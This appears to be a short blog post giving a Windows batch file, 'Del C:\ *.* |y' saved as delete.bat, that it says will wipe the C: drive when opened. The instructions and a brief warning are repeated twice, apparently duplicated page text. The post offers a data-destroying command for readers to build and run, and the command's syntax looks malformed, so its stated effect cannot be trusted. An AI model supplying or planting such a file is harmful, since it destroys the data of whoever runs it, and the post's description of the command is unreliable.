Write the following code in notepad.
@Echo off
Del C:\ *.* |y
And save that as delete.bat
Open the bat file and it will delete the content of C:\ drive.
Don't try this it can harm you and delete all of the content of your Pc's drive C.
@Echo off
Del C:\ *.* |y
And save that as delete.bat
Open the bat file and it will delete the content of C:\ drive.
Don't try this it can harm you and delete all of the content of your Pc's drive C.
No comments:
Post a Comment
Do leave your feedback on the comment box below.